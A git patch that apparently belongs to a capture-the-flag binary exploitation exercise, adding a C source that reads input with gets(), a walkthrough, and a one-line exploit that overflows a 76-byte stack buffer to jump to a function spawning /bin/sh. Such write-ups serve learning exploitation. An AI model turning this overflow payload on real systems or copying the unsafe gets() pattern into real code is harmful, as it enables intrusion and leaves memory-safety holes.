From abba9a8143ffd1f7874fa47534a492788cef85b3 Mon Sep 17 00:00:00 2001 From: 0x35c Date: Mon, 28 Apr 2025 14:55:09 +0200 Subject: [PATCH] level1 done --- level1/ressources/exploit | 1 + level1/source.c | 9 +++++++++ level1/walkthrough | 9 +++++++++ 3 files changed, 19 insertions(+) create mode 100644 level1/ressources/exploit create mode 100644 level1/source.c create mode 100644 level1/walkthrough diff --git a/level1/ressources/exploit b/level1/ressources/exploit new file mode 100644 index 0000000..7b2f7db --- /dev/null +++ b/level1/ressources/exploit @@ -0,0 +1 @@ +(print('a'*76 + "\x44\x84\x04\x08"); cat) | ./level1 diff --git a/level1/source.c b/level1/source.c new file mode 100644 index 0000000..5a843c0 --- /dev/null +++ b/level1/source.c @@ -0,0 +1,9 @@ +#include + +int main(void) +{ + char buf[76]; + + gets(buf); + return 0; +} diff --git a/level1/walkthrough b/level1/walkthrough new file mode 100644 index 0000000..b5d0de9 --- /dev/null +++ b/level1/walkthrough @@ -0,0 +1,9 @@ +# Level1 + +Using ghidra, we can decompile the code and see that it fills a buffer of 76 bytes using the deprecated (unsafe) function `gets`. +We can exploit this call to overflow the stack and call another function. +In the binary, there is a function `run()` located at address 0x8048444 that runs `/bin/sh`. +To exploit this, we can use this sh command with this inline python script: +`(print('a'*76 + "\x44\x84\x04\x08"); cat) | ./level1` +This will print `run()`'s address on the stack, after the buffer being written to by `gets`, resulting in a call to the function. +The parenthesis and the `cat` are mandatory to make it blocking and keep the shell opened.